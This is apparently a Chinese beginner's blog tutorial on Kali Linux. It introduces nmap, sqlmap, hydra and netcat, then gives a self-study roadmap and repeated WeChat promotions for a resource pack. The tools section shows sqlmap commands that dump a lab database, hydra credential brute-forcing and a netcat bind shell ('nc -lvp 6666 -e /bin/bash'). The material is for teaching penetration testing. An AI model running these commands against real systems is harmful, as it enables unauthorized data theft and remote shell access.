【2024版】最新kali linux入門及常用簡單工具介紹（非常詳細）從零基礎入門到精通，看完這一篇就夠了

前言

相信很多同學了解到和學習網絡安全的時候都聽過kali系統，大家都稱之為黑客最喜愛的系統，那么什么是kali，初學者用kali能做些什么，大白我將在本文中做詳細的介紹：

Kali Linux 是專門用于滲透測試的Linux操作系統，它由BackTrack發展而來。在整合了IWHAX、WHOPPIX和Auditor這三種滲透測試專用Live Linux后,BackTrack正式改名為Kali LInux。沒錯，kali的本質也是linux系統，就好比以前的黑客經常使用一些工具，久而久之的大家就共同開源了一個集成了各種黑客工具系統。至于為什么黑客都喜歡使用kali，主要是在kali中工具齊全避免了在需要使用的時候發現工具需要再下載安裝的麻煩

二、安裝下載kali

kali的官網地址：https://www.kali.org

目前kali仍然在保持著更新，目前最新的kali系統為kali purple，里面繼承了更多的防守方使用的工具。

下載解壓后用vm打開即可，默認root賬號密碼均為kali，kali。沒有用過VMware的同學可以先到網上學習如何下載vm。另外新手可能會遇到虛擬機沒有網絡的問題，新手我這里推薦配置網卡時選擇直接連接，等之后了解到網卡網段的知識可以再自己配置想要的網卡信息。（左上角虛擬機，設置，網絡適配器，橋接模式，復制物理網絡連接狀態）

三、kali常見工具介紹

正如剛才所說，kali里集成了大量的黑客工具和網絡安全相關工具，可以說黑客需要做的所有事情在這個系統中都有工具可以實現。下面我推薦幾個新手入門可以用到的小工具。

1.nmap

nmap被稱為諸神之眼，是一款非常強大的網絡探測工具，可以實現主機發現和端口掃描，同時自身也可帶漏洞掃描的腳本可以完成對主機端口的漏洞掃描

nmap最基礎用法：

nmap [目的ip]``nmap 192.168.1.10``   ``nmap [目的網段]``nmap 192.168.1.0/24

map也提供了大量的掃描時候可以設置的參數，下面將舉例常用的參數：

添加參數可以顯示出不同的掃描結果

2.sqlmap

sqlmap是針對sql注入漏洞的一款自動化sql注入探測工具，支持多種操作系統環境和多種數據庫的漏洞探測，滲透測試人員常常調侃“沒有什么操作技術，就是sqlmap一把梭哈，屏幕顯示綠了就直接下班”

sqlmap的基本使用:

sqlmap -u "www.baidu.com"

大家盡量不要在未授權的情況下去對公網資產進行批量掃描，小心去踩縫紉機哦

下面我以sqli-lab里面的靶場為例：

出現圖中綠色信息說明sqlmap對該參數成功注入，注意我的url中在最后以GET方式輸入了參數id（/?id），如果不給sqlmap提供參數sqlmap是無法使用的哦

找到注入點后的步驟基本是確定的

 `sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  --dbs  #獲取當前數據庫服務所開啟的數據庫名稱` `sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  -D 數據庫名 --tables  #獲取某數據庫下的所有表名` `sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  -D 數據庫名 -T 表名 --columns #獲取D數據庫下T表內的所有字段``sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  -D 數據庫名 -T 表名 -C 字段名 --dump  #將該字段的內容全部獲取出來并存儲，在最后的信息中會有存儲路徑信息`

第一步獲取數據庫：

第二步獲取數據庫下表名：

第三步獲取該表字段（其實到表名這一步可以直接–dump獲取表里所有內容）

所以sqlmap的使用難處在于如何找到注入點，也就是找到產生sql注入的參數，在例子里參數是GET方式上傳的“id”參數，下面提供一些sqlmap常用的參數

3.hydra

hydra又稱九頭蛇，是一款非常高效的多種協議都可以使用的爆破工具，對指定ip的指定服務進行爆破，需要輸入爆破使用的字典或者自己指定爆破使用的數據（比如在已知賬號為admin時爆破密碼）

在kali中hydra有圖形化和命令行兩種使用方式

對于新手來說，圖形化界面更加簡易好用，下面介紹圖形化使用

之后選擇start就好了，hydra會使用字典中的所有賬號密碼去做登陸的爆破嘗試

4.netcat

netcat簡稱nc，是一款目前最常用網絡工具，它提供基于socket協議套接字針對TCP，UDP連接的網絡使用，在具有nc使用權時幾乎可以建立任何類型的連接，通常在滲透測試中用該工具獲得目的ip的shell

nc簡單使用方式：建立連接傳輸信息

主機1：開啟對6666端口的監聽

nc -lvp 6666

參數解釋：

主機2：連接主機1的6666端口

nc 192.168.0.163 6666

nc常用使用：獲取遠程主機shell

1.正向連接shell

主機1：

nc -lvp 6666 -e /bin/bash

參數解釋：

這里將主機1的/bin/bash重定向到了自己主機的6666端口

主機2：

nc 192.168.0.163 6666

大家可以思考一下為什么左邊會有下面的報錯呢？并且在執行sudo su嘗試進入root權限時，必須在左側主機輸入密碼才可以進入，進入后才會收到來自右側發來的密碼kali并且產生報錯。可以嘗試了解不同終端bash/zsh/sh的區別

總結

本文簡單介紹了kali系統，只是適合對沒有了解過的新手小白的一個引導

關于我

筆者本人 17 年就讀于一所普通的本科學校，20 年 6 月在三年經驗的時候順利通過校招實習面試進入大廠，現就職于某大廠安全聯合實驗室。

如何自學黑客&網絡安全

黑客零基礎入門學習路線&規劃

初級黑客
1、網絡安全理論知識（2天）
①了解行業相關背景，前景，確定發展方向。
②學習網絡安全相關法律法規。
③網絡安全運營的概念。
④等保簡介、等保規定、流程和規范。（非常重要）

2、滲透測試基礎（一周）
①滲透測試的流程、分類、標準
②信息收集技術：主動/被動信息搜集、Nmap工具、Google Hacking
③漏洞掃描、漏洞利用、原理，利用方法、工具（MSF）、繞過IDS和反病毒偵察
④主機攻防演練：MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系統基礎（一周）
①Windows系統常見功能和命令
②Kali Linux系統常見功能和命令
③操作系統安全（系統入侵排查/系統加固基礎）

4、計算機網絡基礎（一周）
①計算機網絡基礎、協議和架構
②網絡通信原理、OSI模型、數據轉發流程
③常見協議解析（HTTP、TCP/IP、ARP等）
④網絡攻擊技術與網絡安全防御技術
⑤Web漏洞原理與防御：主動/被動攻擊、DDOS攻擊、CVE漏洞復現

5、數據庫基礎操作（2天）
①數據庫基礎
②SQL語言基礎
③數據庫安全加固

6、Web滲透（1周）
①HTML、CSS和JavaScript簡介
②OWASP Top10
③Web漏洞掃描工具
④Web滲透工具：Nmap、BurpSuite、SQLMap、其他（菜刀、漏掃等）

恭喜你，如果學到這里，你基本可以從事一份網絡安全相關的工作，比如滲透測試、Web 滲透、安全服務、安全分析等崗位；如果等保模塊學的好，還可以從事等保工程師。薪資區間6k-15k

到此為止，大概1個月的時間。你已經成為了一名“腳本小子”。那么你還想往下探索嗎？

如果你想要入坑黑客&網絡安全，筆者給大家準備了一份：282G全網最全的網絡安全資料包需要保存下方圖片，微信掃碼即可前往獲取!

因篇幅有限，僅展示部分資料，需要掃下方即可前往獲取

7、腳本編程（初級/中級/高級）
在網絡安全領域。是否具備編程能力是“腳本小子”和真正黑客的本質區別。在實際的滲透測試過程中，面對復雜多變的網絡環境，當常用工具不能滿足實際需求的時候，往往需要對現有工具進行擴展，或者編寫符合我們要求的工具、自動化腳本，這個時候就需要具備一定的編程能力。在分秒必爭的CTF競賽中，想要高效地使用自制的腳本工具來實現各種目的，更是需要擁有編程能力.

如果你零基礎入門，筆者建議選擇腳本語言Python/PHP/Go/Java中的一種，對常用庫進行編程學習；搭建開發環境和選擇IDE,PHP環境推薦Wamp和XAMPP， IDE強烈推薦Sublime；·Python編程學習，學習內容包含：語法、正則、文件、網絡、多線程等常用庫，推薦《Python核心編程》，不要看完；·用Python編寫漏洞的exp,然后寫一個簡單的網絡爬蟲；·PHP基本語法學習并書寫一個簡單的博客系統；熟悉MVC架構，并試著學習一個PHP框架或者Python框架 (可選)；·了解Bootstrap的布局或者CSS。

8、超級黑客
這部分內容對零基礎的同學來說還比較遙遠，就不展開細說了，附上學習路線。

網絡安全工程師企業級學習路線

攻擊和防守要學的東西也不少，具體要學的東西我都寫在了上面的路線圖，如果你能學完它們，你去就業和接私活完全沒有問題。

視頻配套資料&國內外網安書籍、文檔&工具

當然除了有配套的視頻，同時也為大家整理了各種文檔和書籍資料&工具，并且已經幫大家分好類了。

一些筆者自己買的、其他平臺白嫖不到的視頻教程。

如果你想要入坑黑客&網絡安全，筆者給大家準備了一份：282G全網最全的網絡安全資料包免費領取！

因篇幅有限，僅展示部分資料，需要掃下方即可前往獲取

工具包、面試題和源碼

“工欲善其事必先利其器”我為大家總結出了最受歡迎的幾十款款黑客工具。涉及范圍主要集中在信息收集、Android黑客工具、自動化工具、網絡釣魚等，感興趣的同學不容錯過。

還有我視頻里講的案例源碼和對應的工具包，需要的話也可以拿走。

因篇幅有限，僅展示部分資料，需要掃下方即可前往獲取

最后就是我這幾年整理的網安方面的面試題，如果你是要找網安方面的工作，它們絕對能幫你大忙。

這些題目都是大家在面試深信服、奇安信、騰訊或者其它大廠面試時經常遇到的，如果大家有好的題目或者好的見解歡迎分享。

參考解析：深信服官網、奇安信官網、Freebuf、csdn等

內容特點：條理清晰，含圖像化表示更加易懂。

內容概要：包括內網、操作系統、協議、滲透測試、安服、漏洞、注入、XSS、CSRF、SSRF、文件上傳、文件下載、文件包含、XXE、邏輯漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限，僅展示部分資料，需要掃下方即可前往獲取

結語

網絡安全產業就像一個江湖，各色人等聚集。相對于歐美國家基礎扎實（懂加密、會防護、能挖洞、擅工程）的眾多名門正派，我國的人才更多的屬于旁門左道（很多白帽子可能會不服氣），因此在未來的人才培養和建設上，需要調整結構，鼓勵更多的人去做“正向”的、結合“業務”與“數據”、“自動化”的“體系、建設”，才能解人才之渴，真正的為社會全面互聯網化提供安全保障。